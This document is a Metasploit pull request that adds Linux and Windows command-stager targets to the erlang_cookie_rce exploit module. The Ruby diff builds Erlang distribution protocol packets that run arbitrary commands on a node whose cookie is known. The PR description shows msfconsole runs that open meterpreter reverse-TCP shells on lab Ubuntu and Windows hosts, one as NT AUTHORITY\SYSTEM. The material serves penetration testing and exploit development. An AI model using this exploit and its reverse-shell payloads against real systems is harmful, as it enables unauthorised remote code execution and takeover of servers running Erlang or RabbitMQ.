### PR TITLE
Add CmdStager to erlang_cookie_rce

### DIFF
--- a/modules/exploits/multi/misc/erlang_cookie_rce.rb
+++ b/modules/exploits/multi/misc/erlang_cookie_rce.rb
@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = GreatRanking
 
   include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(
@@ -28,8 +29,6 @@ class MetasploitModule < Msf::Exploit::Remote
             ['URL', 'https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/']
           ],
         'License'        => MSF_LICENSE,
-        'Platform'       => ['unix', 'win'],
-        'Arch'           => ARCH_CMD,
         'Privileged'     => 'false',
         'Targets'        =>
           [
@@ -38,10 +37,23 @@ class MetasploitModule < Msf::Exploit::Remote
               'Arch' => ARCH_CMD,
               'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse'},
             ],
+            [ 'Linux (CmdStager)',
+              'Type' => :cmdstager,
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X64, ARCH_X86],
+              'CmdStagerFlavor' => ['printf', 'echo', 'bourne']
+            ],
             [ 'Windows',
               'Platform' => 'win',
               'Arch' => ARCH_CMD,
               'DefaultOptions' => {'PAYLOAD' => 'cmd/windows/adduser'},
+            ],
+            [ 'Windows (CmdStager)',
+              'Type' => :cmdstager,
+              'Platform' => 'win',
+              'Arch' => [ARCH_X64, ARCH_X86],
+              'CmdStagerFlavor' => ['certutil', 'vbs'],
+              'DefaultOptions' => {'PAYLOAD' => 'windows/shell/reverse_tcp'}
             ]
           ],
         'DefaultTarget'  => 0,
@@ -67,26 +79,10 @@ class MetasploitModule < Msf::Exploit::Remote
     return [hash.hexdigest].pack('H*')
   end
 
-  def exploit
-    connect
-
-    our_node = "#{rand_text_alphanumeric(6..12)}@#{rand_text_alphanumeric(6..12)}"
-
-    # SEND_NAME: send initial identification of who "we" are
-    send_name =  "\x00"                                     # Length: 0x0000
-    send_name << [(our_node.length+7).to_s(16)].pack('H*')  #
-    send_name << "\x6e"                                     # Tag: n
-    send_name << "\x00\x05"                                 # Version: R6 (5)
-    send_name << "\x00\x03\x49\x9c"                         # Flags (0x0003499c)
-    send_name << "#{our_node}"                              # <generated>@<generated>
-
-    # SEND_CHALLENGE_REPLY: return generated digest and its own challenge
-    send_challenge_reply =  "\x00\x15"  # Length: 21
-    send_challenge_reply << "\x72"      # Tag: r
-
+  def execute_command(cmd, opts={})
     # SEND: send the message to the node
     send =  "\x00\x00\x00"                                                        # Length:0x00000000
-    send << [(0x50 + payload.raw.length + our_node.length*2).to_s(16)].pack('H*') #
+    send << [(0x50 + cmd.length + @our_node.length*2).to_s(16)].pack('H*') #
     send << "\x70"                                                                #
     send << "\x83"                                                                # VERSION_MAGIC
     send << "\x68"                                                                # SMALL_TUPLE_EXT (104)
@@ -95,8 +91,8 @@ class MetasploitModule < Msf::Exploit::Remote
     send << "\x06"                                                                #       Int: 6
     send << "\x67"                                                                #     PID_EXT (103)
     send << "\x64\x00"                                                            #       Node:
-    send << [(our_node.length).to_s(16)].pack('H*')                               #         Length: strlen(Node)
-    send << "#{our_node}"                                                         #         Node
+    send << [(@our_node.length).to_s(16)].pack('H*')                               #         Length: strlen(Node)
+    send << "#{@our_node}"                                                         #         Node
     send << "\x00\x00\x00\x03"                                                    #       ID
     send << "\x00\x00\x00\x00"                                                    #       Serial
     send << "\x00"                                                                #       Creation
@@ -106,8 +102,8 @@ class MetasploitModule < Msf::Exploit::Remote
     send << "\x00\x03"                                                            #       Length: 3
     send << "rex"                                                                 #       AtomText: rex
     send << "\x83\x68\x02\x67\x64\x00"                                            #
-    send << [(our_node.length).to_s(16)].pack('H*')                               # Length: strlen(Node)
-    send << "#{our_node}"                                                         # Node
+    send << [(@our_node.length).to_s(16)].pack('H*')                               # Length: strlen(Node)
+    send << "#{@our_node}"                                                         # Node
     send << "\x00\x00\x00\x03"                                                    # ID
     send << "\x00\x00\x00\x00"                                                    # Serial
     send << "\x00"                                                                # Creation
@@ -126,12 +122,31 @@ class MetasploitModule < Msf::Exploit::Remote
     send << "\x00\x00\x00\x01"                                                    #       Length: 1
     send << "\x6b"                                                                #       Elements: k
     send << "\x00"                                                                #       Tail
-    send << [(payload.raw.length).to_s(16)].pack('H*')                            # strlen(Command)
-    send << payload.raw                                                           # Command
+    send << [(cmd.length).to_s(16)].pack('H*')                                    # strlen(Command)
+    send << cmd
     send << "\x6a"                                                                # NIL_EXT
     send << "\x64"                                                                # InternalSegmentIndex
     send << "\x00\x04"                                                            #   Length: 4
     send << "user"                                                                #   AtomText: user
+    sock.put(send)
+  end
+
+  def exploit
+    connect
+
+    @our_node = "#{rand_text_alphanumeric(6..12)}@#{rand_text_alphanumeric(6..12)}"
+
+    # SEND_NAME: send initial identification of who "we" are
+    send_name =  "\x00"                                     # Length: 0x0000
+    send_name << [(@our_node.length+7).to_s(16)].pack('H*') #
+    send_name << "\x6e"                                     # Tag: n
+    send_name << "\x00\x05"                                 # Version: R6 (5)
+    send_name << "\x00\x03\x49\x9c"                         # Flags (0x0003499c)
+    send_name << "#{@our_node}"                             # <generated>@<generated>
+
+    # SEND_CHALLENGE_REPLY: return generated digest and its own challenge
+    send_challenge_reply =  "\x00\x15"  # Length: 21
+    send_challenge_reply << "\x72"      # Tag: r
 
     sock.put(send_name)
 
@@ -151,6 +166,13 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     print_good("Authentication successful, sending payload")
-    sock.put(send)
+
+    print_status('Exploiting...')
+    if target['Type'] == :cmdstager
+      execute_cmdstager(:linemax => 100)
+    else
+      execute_command(payload.raw)
+    end
+    disconnect
   end
 end


### PR DESCRIPTION
Add command stager targets to erlang_cookie_rce for additional payload options.

## Verification

List the steps needed to make sure this thing works

- [x] `./msfconsole -q`
- [x] `set target 1` (Linux CmdStager)
- [x] `set cookie <cookie>`
- [x] `set rhosts <rhost>`
- [x] `set payload linux/x86/meterpreter/reverse_tcp`
- [x] `set lhost <lhost>`
- [x] `run`

## Scenarios

### Tested on Ubuntu 16.04.5 LTS running rabbitmq-server

```
$ ./msfconsole -q 
msf5 > use multi/misc/erlang_cookie_rce
msf5 exploit(multi/misc/erlang_cookie_rce) > set target 1
target => 1
msf5 exploit(multi/misc/erlang_cookie_rce) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/misc/erlang_cookie_rce) > set cookie EYHXTKCXVOFTKHLXMQTG
cookie => EYHXTKCXVOFTKHLXMQTG
msf5 exploit(multi/misc/erlang_cookie_rce) > set rhosts 172.22.222.130
rhosts => 172.22.222.130
msf5 exploit(multi/misc/erlang_cookie_rce) > set lhost 172.22.222.136 
lhost => 172.22.222.136
msf5 exploit(multi/misc/erlang_cookie_rce) > exploit

[*] Started reverse TCP handler on 172.22.222.136:4444 
[*] 172.22.222.130:25672 - Receiving server challenge
[*] 172.22.222.130:25672 - Sending challenge reply
[+] 172.22.222.130:25672 - Authentication successful, sending payload
[*] 172.22.222.130:25672 - Exploiting...
[*] 172.22.222.130:25672 - Command Stager progress -  11.34% done (99/873 bytes)
[*] 172.22.222.130:25672 - Command Stager progress -  22.57% done (197/873 bytes)
[*] 172.22.222.130:25672 - Command Stager progress -  33.91% done (296/873 bytes)
[*] 172.22.222.130:25672 - Command Stager progress -  45.02% done (393/873 bytes)
[*] 172.22.222.130:25672 - Command Stager progress -  56.36% done (492/873 bytes)
[*] 172.22.222.130:25672 - Command Stager progress -  67.70% done (591/873 bytes)
[*] 172.22.222.130:25672 - Command Stager progress -  79.04% done (690/873 bytes)
[*] 172.22.222.130:25672 - Command Stager progress -  90.49% done (790/873 bytes)
[*] Sending stage (910632 bytes) to 172.22.222.130
[*] 172.22.222.130:25672 - Command Stager progress - 100.00% done (873/873 bytes)
[*] Meterpreter session 1 opened (172.22.222.136:4444 -> 172.22.222.130:60444) at 2018-12-21 07:17:22 -0600

meterpreter > sysinfo
Computer     : 172.22.222.130
OS           : Ubuntu 16.04 (Linux 4.15.0-29-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.22.222.130 - Meterpreter session 1 closed.  Reason: User exit
```

### Tested on Windows 10 Pro running RabbitMQ Server

```
msf5 exploit(multi/misc/erlang_cookie_rce) > set target 3
target => 3
msf5 exploit(multi/misc/erlang_cookie_rce) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/misc/erlang_cookie_rce) > set lhost 172.22.222.136 
lhost => 172.22.222.136
msf5 exploit(multi/misc/erlang_cookie_rce) > set rhosts 172.22.222.200
rhosts => 172.22.222.200
msf5 exploit(multi/misc/erlang_cookie_rce) > set cookie ZCCVYWSBUFNCNIYRZZCI
cookie => ZCCVYWSBUFNCNIYRZZCI
msf5 exploit(multi/misc/erlang_cookie_rce) > exploit

[*] Started reverse TCP handler on 172.22.222.136:4444 
[*] 172.22.222.200:25672 - Receiving server challenge
[*] 172.22.222.200:25672 - Sending challenge reply
[+] 172.22.222.200:25672 - Authentication successful, sending payload
[*] 172.22.222.200:25672 - Exploiting...
[*] 172.22.222.200:25672 - Command Stager progress -   0.08% done (99/128281 bytes)
[*] 172.22.222.200:25672 - Command Stager progress -   0.15% done (198/128281 bytes)
[*] 172.22.222.200:25672 - Command Stager progress -   0.23% done (297/128281 bytes)
<snip. wait 5 minutes or so...>
[*] 172.22.222.200:25672 - Command Stager progress -  99.79% done (128007/128281 bytes)
[*] 172.22.222.200:25672 - Command Stager progress -  99.86% done (128106/128281 bytes)
[*] 172.22.222.200:25672 - Command Stager progress -  99.93% done (128189/128281 bytes)
[*] Sending stage (179779 bytes) to 172.22.222.200
[*] 172.22.222.200:25672 - Command Stager progress - 100.00% done (128281/128281 bytes)
[*] Meterpreter session 2 opened (172.22.222.136:4444 -> 172.22.222.200:50835) at 2018-12-21 07:29:56 -0600

meterpreter > sysinfo
Computer        : DESKTOP-IPOGIJR
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.22.222.200 - Meterpreter session 2 closed.  Reason: User exit
msf5 exploit(multi/misc/erlang_cookie_rce) > 
```